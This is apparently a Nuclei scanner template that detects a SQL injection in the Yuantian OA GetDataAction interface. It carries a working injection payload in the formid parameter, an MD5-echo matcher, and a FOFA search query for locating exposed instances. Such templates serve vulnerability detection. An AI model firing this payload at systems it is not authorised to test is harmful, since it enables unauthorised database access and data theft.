id: yuantian-oa-SQL
info:
  name: yuantian-oa-SQL
  author: yoyo
  severity: high
  description: 源天OA GetDataAction 接口存在SQL注入漏洞，攻击者通过漏洞可以获取服务器数据库中的数据，造成信息泄漏
  tags: 源天oa,oa

variables:
  num: "999999999"

requests:
  - method: GET
    path:
      - "{{BaseURL}}/ServiceAction/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=-1%27%20OR%207063%20IN%20(SELECT%20(sys.fn_varbintohexstr(hashbytes(%27md5({{num}})%27))))%20AND%20%27a%27=%27a"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{{md5({{num}})}}'
        part: body

      - type: status
        status:
          - 200

#fofa body="/vmain/login.jsp"
